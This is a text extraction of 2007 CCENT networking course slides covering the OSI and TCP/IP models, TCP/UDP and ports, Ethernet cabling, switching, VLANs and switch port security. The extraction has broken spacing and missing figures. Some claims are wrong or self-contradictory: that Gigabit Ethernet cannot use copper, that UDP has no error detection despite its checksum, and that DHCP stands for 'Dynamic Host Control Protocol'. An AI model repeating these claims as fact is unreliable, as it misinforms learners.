Notes

1

© Train Signal, Inc., 2002-2007

CCENT

Cisco Certified Entry Networking Technician

(Interconnecting Cisco Networking Devices Part 1)


Introduction to CCENT


• Introduction to Networking And The Networking Model s • Ethernet and CSMA/CD• Switching• Switch (and Router) Commands• IP Addressing and The Routing Process• Basic Network Protocols• Memory, Config Files, and More Basic Commands• Wireless LANs• Binary and Subnetting• Static Routing and RIP• Wide Area Networks (WANs) • Troubleshooting • Basic Network Security

2


• Your Instructor: Chris Bryant, CCIE #12933• Earned my CCIE on February 26, 2004• Founded The Bryant Advantage in June of

that year.• My Video Boot Camps and other study

materials place an emphasis on clearly explained theory and plenty of work on REAL CISCO routers and switches.

• Visit the website: www.thebryantadvantage.com


• Exam Prep Tips:– Take your time and master the material.

– If possible, practice the commands on real Cisco routers and switches.

– Do not practice debugs on a production network on any time.

– Get plenty of rest the day before exam. By that time, the die is cast.

– Don’t cram for the exam. Prepare.


Video 1Introduction to Networking and the Networking Models

3


Intro to Networking and the Networking

Models

• What is A Network• The OSI Model• The Data Transmission Process• The TCP/IP Model• Why Use Networking Models?• TCP And UDP• Ports, Sockets, and Port Numbers


• When you break networking down into the simplest concept possible, this what we have:– We need to get data from one point to another

in the most effective manner possible.


• We build networks to allow devices such as the ones you see here to communicate with each other, and as differe nt devices are added to the network, this communication become s more challenging to allow.

• And it's not just allowing communication that's cha llenging -there are communications that we do not want to all ow as well. Perhaps we only want one of those PCs to have access to the e-commerce server, and we don't want any other PCs to even know about that server. We also have to be wary of intruder attacks, because there are all kinds of ba d guys who want to get into our network, and we've got to keep them out!

4


• The thought of learning all of this can be intimidating at first. Having worked my way from entry-level certifications all the way to the CCIE, and having taught thousands of CCNAs and CCNPs worldwide, I can tell you that the key to networking success in both the exam room and working with real-world networks can be summed up in five words:


Know And Understand The Fundamentals

• Nothing fancy, right? Right! Learning and understanding the fundamentals of networking are what this course is all about. Most of you will go o n to more advanced studies, and that's great - because in this business, we're always learning new skills. The key to mastering intermediate and advanced networking is to master the fundamentals -because if you don't understand how networks operate, you can't fix them!


Why Are These Models Important?

• When it comes to the OSI and TCP/IP networking models, a common question is "Beyond passing the exam, why do I have to learn this?" I freely admit that I had that thought more than once when I began studying networking. It's particularly tough because this is usually the first material presented to networking students, and to be frank, it's not as exciting as configuring routers and switches.

5


• I can tell you from personal experience that you ar e going to use the material in this chapter throughou t your networking career, so it's not just something that you have to learn to pass the CCENT and CCNA exams.

• I've personally found networking models to be helpful in developing an effective troubleshooting process, and I'll talk more about that in the Troubleshooting section of this course. I just want to let you know that this really is useful information, not just something to memorize.


The Application Layer

• This is the layer where the end users themselves interact with the network. Authentication services also run at Layer 7, but encryption runs at the next layer down.

• The Application layer ensures that the remote communication partner is available, that the needed communication resources exist (a modem, for example), and that both ends of the communication agree on procedures involving data integrity, privacy, and error recovery.


• When trying to decide if a protocol is an Applicati on layer protocol, just remember that protocols that require the end user to enter a request are Application layer protocols. Firewalls , devices intended to keep network intruders out, operate at L7.

• Protocols and services that run at L7 include:– Email protocols SMTP and POP3 – Telnet – HTTP – File Transfer Protocol (FTP) – Simple Network Management Protocol (SNMP)

6


The Presentation Layer

• This layer answers one simple question: "How should this data be presented?" In addition to properly formatting data, encryption occurs at this layer.

• Have you ever opened a file in a word processing application, and you got pages of unrecognizable characters? That’s a Presentation Layer issue. The applications have not agreed on how the data is to be presented.


• There are four primary tasks that the Presentation Layer is concerned with:1. Compatibility with the operating system2. Proper encapsulation of data for network transmission.3. Data formatting (ASCII, binary)4. Data encryption, compression, and translation.

• You've probably seen some of the file types that are used at the Presentation layer - JPEG, ASCII, GIF, MPEG, MIDI, EBCDIC, and TIFF.


The Session Layer

• Layer 5 is the "manager" of the two-way communication between two remote hosts. This is the layer that handles the creation, maintenance, and teardown of communications between those two hosts. The overall communication itself is referred to as a session .

• Some sessions last just long enough to send a unidirectional message, where other sessions will be of longer duration.

7


The Transport Layer

• The Transport Layer’s purpose is to establish a logical end-to-end connection between two systems, segment data received from the upper layers of the OSI model, and to make sure the data gets to the destination in the correct order and free of errors .

• At the Transport Layer, there are two methods for transporting data: connection-oriented , referring to TCP, and connectionless, referring to UDP. We'll take a much more detailed look at TCP and UDP later in this section.


The Network Layer

• It's at Layer 3 of the OSI model that you and I as network admins begin to have a great deal of interaction with the network. IP runs at this layer, and since routers operate here at L3, this layer is often called "the routing layer".

• In a nutshell, routing is a two-question process:– What valid paths exist from the local router to a given

destination? – What is the best path (the "optimal path") to take to get there?

• Lots more on this layer to come later in the course!


The Data Link Layer

• The switches that we'll spend so much time with lat er in the course operate at Layer 2. Wireless Access Points (W APs) also operate at this layer - more on WAPs in the Wireless section. Devices that you may well be using right no w to access the Internet, cable modems and DSL modems, also run at L2.

• We've got four major specifications that run here, some of which you may already be familiar with:– Ethernet – High Data Link Control (HDLC) – Point-to-Point Protocol (PPP) – Frame Relay

8


• A very important distinction: The data link layer does perform error detection through something called the Frame Check Sequence (more on that later), but this layer does not perform error recovery .

• The Data Link Layer is generally referred to as Layer 2, and MAC addresses as Layer 2 addresses . If you're not familiar with MAC addresses, they will b e discussed in more detail in the Ethernet and LAN Switching sections.


• Another name for the MAC address is a little misleading, so let's nail this down. MAC addresses are sometimes called hardware addresses and physical addresses . That's because a MAC address is physically burned into the Network Interface Car d (NIC), which leads to another name for this address -a burned-in address (BIA).

• What's the misleading part? Remember that physical addresses are not used at the Physical layer of the OSI model - they're Data Link layer addresses. That's right - a physical address is used to deliver a frame, but not a physical layer address.


• Switches operate at L2, as do bridges. Layer 3 Switches do exist, but when operating at Layer 3, they’re not switching or bridging. They’re routing. You don't need to know about L3 switches for the CCENT exam, but you should know they exist as they're becoming more and more popular in today's networks.

9


The Physical Layer

• When things get a little complicated in networking, I like to remind myself that "it's all ones and zeroes!" Whatever data our end users are creating, it's going to eventually be "translated" into a series of 1s and 0s. Once that is done, it's the Physical layer that handles the actual data transmission. Anything to do with a physical cable or the standards in use - the pins, the connectors, the electrical current itself - is running at the Physical layer.


The Data Transmission

Process

• When the end user sends data, that data will go through all seven layers of the OSI model. The data is broken up into smaller and smaller parts beginning at Layer 4 (the Transport layer) until it 's in the form of electric signals that can be sent acros s the physical media.

• As the data flows down the OSI model, it's referred to by different terms. You really have to master these and watch for them on your exams. There are four different terms you need to know:


• At the Application, Presentation, and Session layer s, data is simply called "data".

• At the Transport layer, data is placed into segments.• At the Network layer, data is placed into packets.• At the Data Link layer, data is placed into frames.• Finally, at the Physical layer, data takes the form of

bits - and remember, it's all ones and zeroes!

10


• Those are very important terms for your career and especially for your exams. If I mention "segments", you should know I'm discussing the Transport layer of the OSI model without any other hints, because you might not get any other hints!


• As data flows down the OSI model, each layer adds a header that will be removed by the same layer on th e other end of the session. These headers are layer-specific in that the Network layer couldn't care less about the contents of any header except the Network layer on the other end of the session.

• As an end user enters data for transmission to a remote host, the first six layers of the OSI model will add a layer-specific header that contains informati on to be read by the same layer of the OSI model at th e remote location. Note that Layer 2, the Data Link layer, adds both a trailer and a header.


• The combination of data and a layer-specific header is called a Protocol Data Unit (PDU). There's a PDU for each layer; that is, the combination of data an d L7 header information is called an L7 PDU, the data and L6 header information is called an L6 PDU, and so forth.

• After the data is successfully transmitted by the Physical layer to the remote location, the data beg ins to travel back up the model. Each layer will remove the header added by its counterpart - that is, Layer 3 removes the L3 header and reads it, L4 removes the L4 header and reads it, and so forth.

11


• The term same-layer interaction describes the process of a given OSI layer removing the header placed on the data by the same layer on the sending side. For example, the Application layer on the receiving end will remove only the header placed onto the data by the Application layer on the sending side, and so forth.


• This model is another way to look at the overall da ta transport process, and it also uses layers to illustrate the process. However, the TCP/IP model uses only four layers to do so. For the CCENT, CCNA, and any entry-level certification exam from another vendor, it's a very good idea to know…– the layers of both the TCP/IP and OSI model – the responsibilities of each layer – how the layers map from one model to another


• The Application layer of the TCP/IP model maps to the top three layers of the OSI model (Application, Presentation, and Session). Everything that the top three layers of the OSI model do is performed by the TCP/IP model's Application layer.

• The Transport layer of the TCP/IP model maps directly to the Transport layer of the OSI model. TC P and UDP both operate at this layer, and data takes the form of segments.

12


• The Internet layer of the TCP/IP model maps to the Network layer of the OSI model. Both layers are responsible for routing through the use of IP addresses, static routes, and dynamic routing protocols.

• (You will occasionally see some non-Cisco documentation call this layer the Internetwork layer, but "Internet" is the name used in Cisco documentation.)

• Finally, the Network Access layer of the TCP/IP model maps to the Data Link and Physical layers of the OSI model.


So Why Do We Go Through All Of This, Anyway?

• It's natural to ask why we use networking models in the first place. It's a good question, and there are some good answers!

• Networking models do help software vendors create products that are interoperable. (At least, we hope they're interoperable.) That doesn't affect us directly as network admins, but two uses of these models affect us directly both as admins and as students.


• Breaking networking operations up into smaller parts make it easier to learn networking in the first place. By using the OSI model in particular, you can take a structured approach to your learning:– First, learn about cables and physical specifications

(L1) – Then learn about switches and MAC addresses (L2)

– Then start on routing (L3)

13


• Using the OSI model to structure your troubleshooting approach is a real help, too. I always tell students to "start troubleshooting at the physical layer", and you'll see what I mean in the Troubleshooting section of the course. There are two kinds of troubleshooters in the world:– Those who have a structured approach – Those who don't and are basically throwing stuff out

there and hoping something works


• TCP:– Guaranteed delivery – Error detection via sequence and ACK numbers – Windowing – "Connection-Oriented"

• UDP:– "best-effort" delivery, but no guarantee of delivery – No error detection – No windowing – "Connectionless"


TCP's "Three-Way Handshake"

• With TCP, there's work to be done before data is transmitted. The two devices have to agree on some basic parameters before segments can be sent - and this negotiation has the curious name three-way handshake . If that's the first time you've heard this term, you're probably wondering how a handshake can be three-way! Then again, maybe you don't want to know - but to pass the CCENT and CCNA exams, we gotta know! Let's take a step-by-step look at this process.

14


• Before the sender can start sending, there's going to be a negotiation between the two devices regarding rules for data transmission. That negotiation is the three-way handshake itself, which begins with the sender transmitting a TCP segment with the Synchronization ("SYN") bit set. The primary value being negotiated here is the TCP sequence number, which we'll discuss in more detail in the next section. This is the first part of the three-way handshake.


• The recipient responds with a TCP segment with both the synchronization and acknowledgement bits set - a "SYN/ACK". This is part two of the three-way handshake.


• The sender responds with an ACK, and the three-way handshake is complete.

• UDP does not use a three-way handshake.

• In addition to the orderly construction of the communication channel, TCP uses the FIN ("finish) bit to bring the channel down when the communication is closed.

15


TCP's Error Detection / Error

Recovery Feature

• Before we take a look at how TCP performs both error detection and error recovery, we need to draw a very clear line between those two terms. They are not the same thing!– Error detection is finding an error – Error recovery is doing something about the error

• Watch that on your exam. :)


• TCP does both, and it uses both a sequence number and an acknowledgement number ("ack") in the TCP header to do so. In the following example, one host is sending fo ur segments to another host. Each of the segments has a sequence number. That sequence number tells the reci pient in what order to reassemble the segments, and it's als o a fundamental concept in error detection and recovery .

• For simplicity's sake, we'll assume the first segme nt has a sequence number of 100, and we'll add 100 to the su bsequent sequence numbers. (Remember, we're at the Transport layer -these are segments!)


• The recipient will now send a segment back that contains no data, but does have an ack number set. You might think that the ack number would reflect the last sequence number received, but that's not quite right. The ack number will actually indicate the next sequence number the data recipient expects to see!

16


• This entire process revolves around two things:– The sender is waiting for a positive message from the

recipient that the data was received – If that message isn't received, the data is

retransmitted

• That's why we call this entire process Positive Acknowledgement with Retransmission (PAR).


• "Windowing" refers to the amount of data that a data sender is allowed to transmit without waiting for an ack. In this case, the size of the window is 2400 bytes, meaning that the data sender can transmit 2400 bytes before it has to stop and wait for an ack.

• The data recipient decides the size of the window, not the sender. This gives the recipient some control over how much data is sent ("flow control").


• The term sliding window refers to this dynamic adjustment of the window size.

• UDP does not have windowing capabilities.

17


• All of the features we've looked at here - the three-way handshake, windowing, sequence numbering, error detection and recovery -are all TCP features. UDP doesn't use any of them. Two questions come to mind:– Why doesn't UDP offer these features? – Why in the world do we use UDP for anything?

• A look at the TCP and UDP headers will answer both of those questions! Here's the TCP header...


• Quite a difference! Take a few moments to compare the two and you'll see that UDP can't perform any o f those TCP features because UDP literally can't offer them. The UDP header has no sequence number field, no ack number field, no ACK bit, no SYN bit, and no window field.

• The TCP and UDP headers have only three values in common:– Source port – Destination port – Checksum


• Now that we've answered the question about why UDP doesn't offer the features that TCP does, let's answer the second question regarding why UDP is used in the first place. That question can really be answered with one word... overhead.

• The TCP header is much larger than the UDP header. That header is being applied to every segment, and that adds up! UDP's advantage over TCP is that its header is much smaller than TCP's.

18


• If you're not familiar with MAC or IP addressing, we're going to cover that in another section, but for now it's enough to know that when two hosts communicate on a network, they're using these MAC and IP addresses as the destination when the data is sent.


• So far, so good. But what if one host is sending multiple flows of information to the remote host? Let's say that the PC at 10.1.1.1 is sending three different kinds of information to the PC at 10.1.1.2:– transferring a file via Trivial File Transfer Protocol

(TFTP) – email via Simple Mail Transfer Protocol (SMTP)

– opening a remote connection via Telnet


• If you're not familiar with those three protocols, don't worry about it - you will be before you're done with this course. For now, it's enough to know that one PC is sending three different types of information to the other, and the MAC and IP source and destination addresses for all three transmissions is going to be the same. How can the receiving host tell TFTP from SMTP if that's the case?

19


• We need a way for the recipient to differentiate one data flow from the other, and since the source and destination MAC and IP addresses will be the same for all three flows, that won't do. What will do is the TCP or UDP port number. While these three data flows will have the same Layer 2 (MAC) and Layer 3 (IP) source and destination addresses, they'll have different, pre-assigned port numbers.


• These port numbers allow the host at 10.1.1.1 to mix these three data streams when sending to 10.1.1.2, rather than sending all the SMTP data, then the Telnet data, then the TFTP data. The PC at 10.1.1.2 will use the port numbers to drive the three different data streams to the appropriate application. This mixing of data streams is called multiplexing.


• A socket may sound like something physical on the PC, but it's not. The socket is simply a combination of IP address and port number. For example, the socket on 10.1.1.2 for port 69 is 10.1.1.2:69. That socket can also be expressed with this format:

• (IP address, transport protocol, port number)

• That would make the TFTP socket on that PC (10.1.1.2, UDP, 69).

20


• The port number system works beautifully, but naturally the hosts need to agree on what port is used for a given protocol. In the previous example, if 10.1.1.1 used TCP port 45 for Telnet and 10.1.1. 2 used TCP port 55, we'd have some serious problems.

• That's why most protocols use the same port number at all times, and these port numbers are referred to as well-known port numbers. All port numbers below 1024 are reserved, well-known port numbers -- but you don't have to memorize 1024 numbers for the exams!


• I do strongly recommend you have the following port numbers memorized, however. These numbers will become second nature to you as you progress in your networking studies and your career, but for now we gotta memorize these! After this list, I'll show you a little trick you can use on a Cisco rout er to see a list of well-known port numbers.

• Since you won't be allowed to carry a router into t he exam room, though, know this list cold! Don't worry if there are services or protocols on here you're n ot yet familiar with - you will be before the end of th is course.


• Some Common TCP Ports:– FTP - File Transfer Protocol - Uses TCP ports 20 and

21– SSH - Secure Shell - Uses TCP port 22– Telnet uses TCP port 23– SMTP - Simple Mail Transfer Protocol - uses TCP

port 25– HTTP - HyperText Transfer Protocol - uses TCP port

80– POP3 - Post Office Protocol 3 - uses TCP port 110– SSL - Secure Socket Layer - uses TCP port 443

21


• Some Common UDP Ports:– DHCP - Dynamic Host Control Protocol - uses UDP ports 67 and

68– TFTP - Trivial File Transfer Protocol - uses UDP port 69– SNMP - Simple Network Management Protocol - uses UDP port

161

• Protocols Using Both TCP And UDP Ports– DNS - Domain Name Service - uses UDP and TCP port 53– The port number 24 is reserved in both UDP and TCP for private

mail systems


• With Voice over IP (VoIP) becoming more and more commonplace in today's networks, it couldn't hurt to know that the entire range of UDP ports from 16384 - 32767 are reserved for voice traffic.


Video 2Ethernet Standards

And Cable Types

22


Ethernet Standards and Cable Types

• The Need For And Operation of CSMA/CD• Ethernet Types And Standards• Pins And Transmissions• Crosstalk• Cable Types• Ethernet Addressing• Intro to WAN Cabling And a Cable Type

Review


• With each host connected to its own switch port, we no longer have to worry about collisions when hosts send data simultaneously. In the old days of networking, though, that wasn't the case. While you may not see the following physical topology very often in your career, if at all, I'm presenting it here so you know how hosts on a shared Ethernet segment practice CSMA/CD - Carrier Sense Multiple Access with Collision Detection .


• The Ethernet standard you're most likely to be familiar with is 10Base-T, specified by IEEE 802.3. The "T" stands for twisted-pair cable, and th e maximum length of a 10Base-T copper cable is 100 meters. The "10" refers to the 10 MegaBits Per Second (MBPS) capacity.

• You may be asking "Why twist the cable pairs?" Twisting pairs of wires inside the cable cut s down on the possibility of electromagnetic interference, whether that interference comes from another cable or an outside source - elevators are notorious for generating such interference.

23


• In the previous illustrations, we looked at a netwo rk with a single coaxial cable and multiple hosts connected to that coax cable. That topology was used by the first Ethernet standards, 10Base5 and 10Base2 .

• The sole physical components were the Ethernet cards in the computers and coaxial cable, which is the topology we looked at in the previous example. The cable made up a bus that all the connected devices would use. (This type of bus is referred to as a shared bus .)


• The ending numbers in the terms “10Base5”and “10Base2” allegedly refer to the limit on the length of the cable, expressed in units of 100 meters. This is true for 10Base5; the limit on the cable length is 500 meters. It’s not quite accurate for 10Base2, though; the limit on that cable is 185 meters, NOT 200 meters.


• Fast Ethernet is defined by IEEE 802.3u, and has a maximum capacity of 100 MBPS. Fast Ethernet copper cables also have a maximum cable length of 100 meters.

24


• Defined by IEEE 802.3z, Gigabit Ethernet has a maximum capacity of 1000 MBPS, also expressed as 1 GBPS (GigaBits Per Second). The maximum cable length is 100 meters here as well, but we cannot use a regular copper cable for Gigabit Ethernet.


• Ethernet runs at 10 MBPS, defined by IEEE 802.3, and its copper cable has a maximum length of 100 meters. Variations include 10Base-T, 10Base-2, and 10Base-5, with the last two involving a shared cabl e bus.

• Fast Ethernet runs at 100 MBPS, is defined by IEEE 802.3u, and its copper cable has a maximum length of 100 meters.

• Gigabit Ethernet runs at 1000 MBPS (1 GBPS), is defined by IEEE 802.3z, and also has a 100 meter cable length maximum - but it cannot use copper cabling.


• A standard Ethernet cabling type is Category 5 Unshielded Twisted-Pair, commonly known as CAT 5 UTP. The connector on the end of a typical Cat 5 UTP cable is an RJ-45 connector. This type of connector has a tab on the bottom that snaps into place when the connector is correctly placed into the device. (You can usually hear the “snap”sound, unless you’re in a very loud wiring closet!)

25


• The cable will contain separate wires inside, and the endpoints of these wires are referred to as pins . While you now know that bits are sent over these wires, it’s important to know that the same set of pins is always used to transmit, and a separate set of pins is always used to receive.– Pins 1 and 2 Transmit– Pins 3 and 6 Receive


• Crosstalk is caused by the electromagnetic interference mentioned a moment ago. Basically, a signal “crosses over” from one pair of cables to another, causing the signals to become unusable.

• NEXT (near-end crosstalk) is a condition generally caused by crossed or crushed pairs of wires. The conductors inside the wires don’t even have to be exposed – but if the conductors are too close, the signal traveling on one wire can actually interfere with the signal on another wire. The “near-end” is a relative term, referring to the end of the cable be ing tested (as opposed to far-end crosstalk, or FEXT).


• In a typical RJ-45 connection, the crosstalk is actually at its highest level as data enters the cable.

• You may occasionally see the term PSNEXT. This is short for “Power Sum Near End Cross Talk”, and refers to the calculation carried out when a NEXT test is run. When the NEXT results for each pair of wires is added, the result is the PSNEXT value.

26


• In the following exhibit, we've got three separate physical connections:– A laptop connected to a switch (Cable 3) – Two switches connected to each

other (Cable 2) – A PC connected to a switch (Cable 1)


• For Cable 1, we need a straightthrough cable. A straightthrough cable is used to connect a PC to a switch or hub. In a straight-through cable, the wire connected to Pin 1 on one side is connected to Pin 1 on the other, the wire connected to Pin 2 on one side is connected to Pin 2 on the other, and so forth.


• You may have occasion to connect two similar devices directly with Ethernet, which can cause a problem since both devices will use the same pair o f wires for transmitting data.

• It's very common to connect two switches to allow them to send data over that connection, called a trunk . You'll learn all about the particulars of trunking in your CCNA studies, but the first thing we have to do is make sure we have the correct cable!

27


• What we need is a crossover cable . The wire connected to Pin 1 on one side will no longer be connected to Pin 1 on the other, as it was in a straight-through cable. Four wires will "cross over" in a crossover cable:


Local Cable EndPin 1Pin 2Pin 3Pin 6

Remote Cable EndPin 3Pin 6Pin 1Pin 2


• Two cables down, one to go! To connect that laptop directly to a switch, we've got to be careful of two things:– Using the right cable – Connecting the right cable to the right port on

the switch

28


• The cable we need is a rollover cable. All eight wires in the cable will "roll over" to another pin at the remote end, with the wire on Pin 1 at one end rolling over to Pin 8 at the other end, the wire on Pin 2 at one end rolling over to Pin 7 at the remote end, and so forth.


• You may also need an adapter for your rollover cable, since one end of the cable is a DB-9 connector, and few if any of today's laptops have such a port. You probably do have USB ports on your laptop, and you can get an adapter that allows you to connect a rollover cable to your laptop's USB port from just about any cable dealer.


• As for the connection to the switch, you need to make sure you connect the RJ-45 connector on the other end of the rollover cable to the Console port of the switch. I'll drive this point home at least one more time elsewhere in the course!

29


Ethernet / NIC / Physical / LAN / BIA Addressing

• You may be thinking "oh, man, that's a lot of addressing!" Actually, it's not, because these are a ll different names for the same thing. The fifth name i s the term you hear most often -- MAC address, short for Media Access Control.

• The MAC address is used by switches to send frames to the proper destination, as you'll see in the LAN Switching section. Before you get to that section, let's take a look at the format of the MAC address.


• The entire MAC address is a 48-bit address that looks a little something like this:

aa-bb-cc-11-22-33


• That MAC address actually has two parts, the first being the Organizationally Unique Identifier (OUI). The OUI is assigned to hardware vendors by the Institute of Electrical and Electronics Engineers (IEEE). A given OUI is assigned to one and only one vendor.

30


• The second half of the MAC address is a value not yet used by that particular vendor. Looking at the MAC address example given earlier, we now know that:– The OUI is aa-bb-cc – The vendor has not yet used 11-22-33 with that

particular OUI, so the vendor is doing so now


• The MAC is sometimes called the physical address because it physically exists on the network card. The address is burned into the card, giving it yet another name - the Burned-In Address (BIA).

• As with IP addresses, we have broadcast and multicast MAC addresses. It's a good idea to be able to identify these addresses, and here's how to do it!


• The broadcast MAC address is the "all-Fs" address: ff-ff-ff-ff-ff-ff (or FF-FF-FF-FF-FF-FF, as case does not matter in hexadecimal)

• There is a range of multicast MAC addresses, and the first half of a multicast MAC address is always 0100.5e. The second half of a multicast MAC address will fall in the range 00-00-00 through 7F-FF-FF. Watch that 7! :)

31


WAN Cabling

• Cisco routers will use serial cables for connections using their serial interfaces (typical frame relay)

• In home labs, you may connect Cisco router serial interfaces directly with a DTE/DCE cable


Cable Type Review

• Crossover cables are used to connect two like devices, typically two switches.

• Rollover cables are used to connect a laptop’s serial port to the router or switch Console port.

• Straightthrough cables are used to connect a PC to a switchport.

• Watch the cable types and the cable lengths – any cable over 100 meters is cause for alarm.


Video 3Switching

32


Switching

• Repeaters, Hubs and Bridges• Building the MAC Table• “Flood, Filter or Forward?”• Frame Processing Methods• Virtual LANs• Cisco Three-Layer Switching Model• Introduction to STP• Basic Switch Security• Port Security Defaults, Options and Configurations


• With many networking terms, the name is indeed the recipe, and that's very true of a repeater . A repeater's job is to repeat an electrical signal, t he form that our data has taken to be sent across a cable. Remember, "it's all ones and zeroes!"

• The repeater takes an incoming signal and then generates a new, clean copy of that exact signal. This prevented maximum cable lengths from stopping transmissions, and also helped to ward off attenuation - the gradual weakening of an electric signal as it travels.


• A hub is basically the same as a repeater, but the hub will have more ports. That's the only difference between the two. (Some hubs have greater capabilities than others, but a "basic" hub is simp ly a multiport repeater.)

• Neither hubs nor repeaters have anything to do with the Data Link layer of the OSI model, nor do they perform any switching at all. Hubs and repeaters are strictly Physical layer devices, and that's where t he trouble comes in. For our next example, we'll consider a hub with four PCs connected to it.

33


• To prevent this, a host on a shared Ethernet segment will use CSMA/CD (Carrier Sense Multiple Access with Collision Detection). To review, here's the CSMA/CD process:– A host that wants to send data will first "listen to the

wire", meaning that it checks the shared media to see if it's in use.

– If the media is in use, the host backs off for a few milliseconds before checking again.

– If the media is not in use, the host sends the data.


• If two PCs happen to send data at the exact same ti me, the voltage on the wire will actually change, indicatin g to the hosts that there has been a data collision .

• The two PCs that sent the data will generate a "jam signal", which indicates to the other hosts on the shared me dia that they should not send data due to a collision.

• Those two PCs both invoke a backoff timer, also in milliseconds. When each host's random timer expires, they will each begin the entire process again by listening to the wire. Since the backoff timer value is totally rando m, it's unlikely the two hosts will have the same problem a gain.


• Before we talk about switches, here's an old joke:– Q. What's the difference between bridges

and switches?– A. Marketing.

34


• Let's review the key concepts of hubs vs. switches.– With hubs, we've got one big collision domain consisting of all

connected hosts. When hosts are connected to their own switch ports, they each have their own individual collision domain.

– Hubs only allow one device to transmit at a time, resulting in shared bandwidth. Switches allow hosts to transmit simultaneously.

– When one host connected to a hub sends a broadcast, every other host receives that broadcast and there's nothing we can doabout it. When a host connected to a switch sends a broadcast, every other host receives it by default - but there is something we can do about that, as you'll see in the VLAN section of this course.


• Microsegmentation is a term sometimes used in Cisco documentation to describe the "one host, one collision domain" effect of that last bullet point. It's not a term I hear a great deal in the field, and you might not either, but it's a good term to know for Cisco exams.


• A Cisco switch will do one of three things with an incoming frame:– Forward it – Flood it – Filter it

• To make this decision, the switch uses its MAC Address table to check if there's an entry for the destination MAC address - but first, the switch will actually check to see if there's an entry for thesource MAC address of the frame, because it's that source MAC that the switch will use to actually buil d the table in the first place!

35


SW1#show mac-address-tableMac Address Table

-------------------------------------------Vlan Mac Address Type Ports---- ----------- -------- -----

All 0008.7de9.9800 STATIC CPUAll 0100.0ccc.cccc STATIC CPUAll 0100.0ccc.cccd STATIC CPUAll 0100.0cdd.dddd STATIC CPU

1 aaaa.aaaa.aaaa DYNAMIC Fa0/1Total Mac Addresses for this criterion: 5


SW1#show mac-address-table dynamic

Mac Address Table-------------------------------------------

Vlan Mac Address Type Ports

---- ----------- -------- -----1 aaaa.aaaa.aaaa DYNAMIC Fa0/1

Total Mac Addresses for this criterion: 1


• No, so the switch will create one.


Mac Address Table

-------------------------------------------Vlan Mac Address Type Ports


1 cccc.cccc.cccc DYNAMIC Fa0/2

36



Mac Address Table-------------------------------------------

Vlan Mac Address Type Ports


1 bbbb.bbbb.bbbb DYNAMIC Fa0/11 cccc.cccc.cccc DYNAMIC Fa0/2

1 dddd.dddd.dddd DYNAMIC Fa0/3


• We don't get to say "never" in networking very often, and as you progress in your studies, you'll learn there's almost always an exception to the rule in CiscoLand. (That's what makes it fun, though!) There is no exception to this particular rule, though:

• Switches never send a frame back out the same port it came in on.


• Flooding is performed when the switch has no entry for the frame's destination MAC address. When a frame is flooded, it is sent out every single port on the sw itch except the one it came in on. Unknown unicast frames are always flooded.

• Forwarding is performed when the switch does have an entry for the frame's destination MAC address. Forwarding a frame means the frame is being sent out only one port on the switch.

• Filtering is performed when the switch has an entry for both the source and destination MAC address, and th e MAC table indicates that both addresses are found o ff the same port.

37


• There's one other frame type that is sent out every port on the switch except the one that received it, and that's a broadcast frame . Broadcast frames are intended for all hosts, and the MAC broadcast address is ff-ff-ff-ff-ff-ff (or FF-FF-FF-FF-FF-FF, as a MAC address's case does not matter).


• Now that we've looked at how the MAC table is built , let's take a look at the different names this table is called:– CAM table (short for Content Addressable Memory) – bridging table – switching table – MAC table

• Anytime you see those terms, they're referring to t he MAC address table. Four names for the same thing? Welcome to networking! ;)


• Once the switch decides whether to forward, filter, or flood the frame, there's one more decision to be made - what processing method will be used to handle this forwarding?

• The processing options are:– store-and-forward – cut-through – fragment-free

38


• This continual generation of new broadcasts is called a broadcast storm , and this is one storm that can sink your switch for good.

• A broadcast storm can overwhelm a switch's memory and CPU capabilities, rendering the switch virtually useless.


• To illustrate how Virtual LANs can help limit broadcast propagation, we'll assign an IP address to each one of our hosts and then take a look at the default Cisco switch settings for VLANs. The circle(s) will continue to illustrate the broadcast domain(s). The numbers on the switch indicate the switch port that's connected to that host.


• It's vital to remember that no traffic -pings or data packets - can be sent from one VLAN to another without the intervention of a Layer 3 device, most likely a router.

39


• The first time you hear the term "campus network" or "campus LAN", the word "campus" may suggest a university or a school of some kind. While such a school may well have a campus LAN, that term is used to describe any network that connects multiple buildings that are physically close to each other.

• The Cisco switching model consists of three layers:– Access – Distribution – Core


• Cisco switches use the Spanning Tree Protocol (STP) to prevent switching loops, and luckily, STP is enabled by default. You'll learn much more about STP in your CCNA studies, but you need to know its basics now. STP will determine a loop-free path for frames, and ports that are not on that path will be placed into blocking mode.


• The first one is about as basic as it gets. Lock up your switches - preferably more than once!

• No casual passerby should even know your switches exist, much less be able to yank a cable out just f or the fun of it. Many server rooms have passcard systems or at least a locked door, but occasionally I still see a server room that's relying on the kindn ess of strangers.

• Don't do that!

40


• Unused VLANs - An Often Overlooked Security Feature

• We spoke about VLANs at length earlier in this section, but you can also use an unused VLAN as a security feature.

• Cisco switch ports on many models have some undesirable defaults:– They're open, where router interfaces are shut by default – They're actively attempting to trunk, meaning they are available

for connection to another switch – All ports are in VLAN 1, and everyone knows that


• These are not desirable defaults when it comes to unused ports on a switch. From top to bottom, here's how we can change those defaults to increase switch security:– Close unused ports with the shutdown command – Prevent the port from trunking with the switchport

mode access command – Place the port into an unused VLAN


• As usual, the switch will first inspect the source MAC address of an incoming frame. If the incoming source MAC address is considered secure, the user will be able to access the network. If the source MAC is considered non-secure, the port will take one of several actions - more on that in a moment. The source MAC address of the incoming frame really acts as a password.

41


• aging allows you to set aging options for secure MAC addresses.

• mac-address allows you to specify secure MAC addresses.

• maximum allows you to specify how many secure MAC addresses there will be. The default is one.


• violation allows you to specify what should happen if a non-secure source MAC address is received on the port. Those options are:

SW2(config-if)#switchport port-security violation ?

protect Security violation protect moderestrict Security violation restrict mode

shutdown Security violation shutdown mode


• The default mode is shutdown, and this mode shuts the port down, transmits a message to the log indicating the action taken, and drops the violatin g frames. The interface status will be err-disabled,(short for error-disabled) meaning it must be manually reopened.

• restrict drops the violating frames and transmits a message to the log indicating an issue, but does no t shut the port down.

• protect simply drops the violating frames.

42


• To configure the port to shut down if a frame is received with any source MAC address other than bb-bb-bb-bb-bb-bb, we'd use the following config:

SW2(config)#int fast 0/3SW2(config-if)#switchport mode access

SW2(config-if)#switchport port-security

SW2(config-if)#switchport port-security mac-address bbbb.bbbb.bbbb


• There's always a chance that you don't know the source MAC address that should act as the secure address. If you configure the port with sticky port security (don't blame me, I didn't name it!), the first source MAC address learned on the port will be the secure address, and all others will be non-secure unless you use the maximum option to change that.

SW2(config-if)#switchport port-security mac-address sticky


• The command show port-security interface fast0/3 verifies that port security is running, the port status, violation mode, the number of secure MAC addresses, and even the last source address of the last frame received!

43


